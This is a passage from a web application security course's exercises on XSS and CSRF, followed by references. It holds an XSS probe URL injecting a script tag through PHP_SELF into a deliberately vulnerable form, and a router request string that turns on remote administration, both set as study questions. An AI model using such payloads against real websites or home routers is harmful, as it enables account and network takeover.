Exercise 305 Can SSL help protect your website against cross site scripting
vulnerabilities?
Exercise 306 The following code can be considered quite generic for receiving
information in a form to the same webpage that is displaying the form:
<form action="<?php echo $ SERVER[’PHP SELF’];
?>">
<input type="text" name="the text" />
<input type="submit" value="Submit text" />
</form>
29
Assume that the webpage containing the form is located at www.server.com/index.php.
Then $ SERVER[’PHP SELF’] should contain /index.php. But what if you visit
the webpage with the URL
www.server.com/index.php/"><script>alert(’Hello’)</script><e
What happens and why? Clearly, the form should not be constructed this way.
How should it be made instead?
Exercise 307 How can users protect themselves against XSS attacks?
Exercise 308 How can web applications protect themselves against CSRF at-
tacks?
Exercise 309 A possible protection against CSRF attacks (on the user side)
is to not send any cookies in cross-domain POST requests, i.e., requests that
are sent to a domain which did not host the form or the script responsble for
the request. Why would this protect against CSRF attacks? Would it protect
against all CSRF attacks?
Exercise 310 Home DSL routers are commonly used to provide Internet ac-
cess for home users. They also allow several users on a home network to access
Internet using one connection. The fact that many home routers could be com-
promised received much attention in late 2008. A typical default security setting
is to disable WAN administration, i.e., administration from outside the home
network. Only LAN administration is allowed. Since only computers inside the
home network can access the configuration menu of the router, another typical
default setting is to allow administration without a password. In other words,
computers on the home network are considered trusted. It is possible to enable
WAN administration and set a password for accessing the router from outside
the home network. The setting can be set in one of the configuration menus.
The setting is enabled by the HTTP request
Password=secret&EnableWANAdminAccess=on
In some cases it turned out that GET requests could be used as well. The at-
tacker’s goal is to enable remote administration and choose the password. After
that, the attacker can control all network traffic leaving the router by e.g., chang-
ing the DNS used.
a) Describe a CSRF attack on this setting. Under what circumstances will
the attack work?
b) To improve security, basic or digest access authentication with a well-
chosen password can be used to protect the router. Describe a CSRF attack
on this setting. Under what circumstances will the attack work?
30
c) An alternative to HTTP authentication is to use web based login. Describe
a CSRF attack on this setting. Under what circumstances will the attack
work?
References
[1] A. Barth, C. Jackson, and J. C. Mitchell. Robust defenses for cross-site
request forgery. In Proceedings of the 15th ACM conference on Computer
and communications security, CCS ’08, pages 75–88. ACM, 2008.
[2] D. Crockford. The application/json Media Type for JavaScript Object
Notation (JSON). RFC 4627 (Informational), July 2006. Available at:
http://www.ietf.org/rfc/rfc4627.txt.
[3] M. Cross. Developer’s guide to web application security. Syngress, 2007.
[4] Amit Klein. “Divide and Conquer” HTTP Response Splitting, Web
Cache Poisoning Attacks, and Related Topics, 2004. Available at:
http://dl.packetstormsecurity.net/papers/general/whitepaper httpresponse.pdf.
[5] D. Stuttard and M. Pinto. The Web Application Hacker’s Handbook: Dis-
covering and Exploiting Security Flaws. Wiley, 2007.
[6] W3C. Cross-origin resource sharing. Available at:
http://dev.w3.org/2006/waf/access-control/, 2010.
[7] W3Schools.com. HTML DOM Tutorial. Available at:
http://www.w3schools.com/htmldom/.
[8] M. Zalewski. Browser security handbook, part 2. Available at:
http://code.google.com/p/browsersec/wiki/Part2, 2008, 2009.
31